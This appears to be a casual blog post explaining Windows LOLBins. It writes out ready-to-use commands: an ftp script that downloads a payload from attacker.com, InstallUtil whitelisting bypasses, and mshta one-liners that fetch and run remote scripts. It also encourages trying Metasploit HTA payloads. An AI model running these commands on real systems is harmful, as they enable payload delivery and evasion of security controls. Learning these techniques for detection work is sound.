It's time to look into LOLBins, and have some fun with that. So what is it. It's system files / commands, that can be used in a malicious way, as part of an cyber attack chain. So, it's the kind of files you would want to monitor, when they're called and who calls them. And why does it matter ?. Because some of them can download and upload files, be used for evading antivirus, and a lot more.
It's a tactic known as Living Of The Land, (using what's at hand), to attack a system. And here, Powershell, and WMIC also comes into play, as they are installed on every Windows systems, so they really are a hackers best friend, at least for now. And, why ?, because sad to say, Powershell was never designed with security in mind, but simply as an easy way for Administrators to do their job. So, if attacking a system is your fancy, I really would recommend you look into Powershell programming :)
So, let's look into a couple of LOLBins, just to gain an understanding of what they do, and how it works. There's a lot of them all documented here.
One LOLBin is the FTP command
#write the calc.exe into the file ftpcommands.txt and calls ftp to execute the command
echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
#or call command directly from inside the ftp client vith !calc.exe
#download with ftp
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Next up in the list, is InstallUtil. It can bypass AWL, and execute DLL and exe files.
# Execute DLL and bypass AWL
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
# Execute exe and bypass AWL
InstallUtil.exe /logfile= /LogToConsole=false /U evil_payload.exeAnd last, let's look into mshta.exe
# Execute hta file
mshta.exe evilfile.hta
# Download and Execute HTA file
mshta.exe https://webserver/evilfile.hta
# Download and Execute VBScript
mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
# Download and Execute Javascript
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
# Get file from ADS, and execute
mshta.exe "C:\ads\file.txt:file.hta"So, something to play around with, and see how it all works. Try to load up the Metasploit Framework, and generate a malicious HTA, and see if it executes, or try to combine this with Powershell, HID attacks, and HID injection with Logitacker, and you'll see what I mean, there's fun times ahead :)
How this is used in malware attacks, you can find a writeup of here https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/
Have fun :)